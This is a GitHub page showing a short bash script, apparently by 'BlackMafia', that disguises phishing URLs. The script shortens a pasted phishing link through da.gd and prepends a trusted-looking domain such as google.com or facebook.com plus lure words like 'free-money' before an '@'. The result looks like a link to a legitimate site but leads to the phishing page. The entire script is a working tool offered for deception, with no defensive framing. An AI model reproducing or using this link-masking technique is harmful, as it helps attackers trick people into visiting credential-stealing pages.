-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathLinkEditor.sh
More file actions
45 lines (43 loc) · 2.78 KB
/
Copy pathLinkEditor.sh
File metadata and controls
45 lines (43 loc) · 2.78 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# Bash Script for Hide Phishing URL Created by BlackMafia
url_checker() {
if [ ! "${1//:*}" = http ]; then
if [ ! "${1//:*}" = https ]; then
echo -e "\e[31m[!] Invalid URL. Please use http or https.\e[0m"
exit 1
fi
fi
}
echo -e "\e[35m███████╗██████╗░██████╗░░█████╗░██████╗░\e[0m"
echo -e "\e[35m██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗\e[0m"
echo -e "\e[35m█████╗░░██████╔╝██████╔╝██║░░██║██████╔╝\e[0m"
echo -e "\e[35m██╔══╝░░██╔══██╗██╔══██╗██║░░██║██╔══██╗\e[0m"
echo -e "\e[35m███████╗██║░░██║██║░░██║╚█████╔╝██║░░██║\e[0m"
echo -e "\e[35m╚══════╝╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝\e[0m"
echo -e "\e[35m░░██╗██╗██╗░░░██╗░█████╗░██╗░░░██╗\e[0m"
echo -e "\e[35m░██╔╝██║╚██╗░██╔╝██╔══██╗██║░░░██║\e[0m"
echo -e "\e[35m██╔╝░██║░╚████╔╝░██║░░██║██║░░░██║\e[0m"
echo -e "\e[35m███████║░░╚██╔╝░░██║░░██║██║░░░██║\e[0m"
echo -e "\e[35m╚════██║░░░██║░░░╚█████╔╝╚██████╔╝\e[0m"
echo -e "\e[35m░░░░░╚═╝░░░╚═╝░░░░╚════╝░░╚═════╝░\e[0m"
echo -e "\e[35m------ Your Mind is Your Best Weapon------\e[0m"
echo -e "\e[1;36;42m Phishing URL Editor \e[0m \n"
echo -n "Paste Phishing URL:"
read phish
url_checker $phish
short=$(curl -s https://da.gd/s/?url=${phish})
shorter=${short#https://}
echo -e "\n\e[1;32;42m Making Domain \e[0m"
echo -e "\e[31m Domain to Make the Phishing URL (with http or https)\e[0m"
echo -e "\e[32m https://google.com\e[0m"
echo -e "\e[33m http://anything.org\e[0m"
echo -e "\e[34m https://facebook.com\e[0m"
echo -en "\e[32m=BlackMafia=>\e[0m "
read mask
url_checker $mask
echo -e '\n\e[1;33;42mType social engineering words:(like free-money, best-pubg-tricks)\e[0m'
echo -e "\e[31mDon't use space just use '-' between social engineering words\e[0m"
echo -en "\e[32m=BlackMafia=>\e[35m "
read words
echo -e "\n\e[1;34;42m Generating Phish Link... \e[0m"
final=$mask-$words@$shorter
echo -e "\e[33mHere is the Phish URL:\e[36m ${final} \e[0m"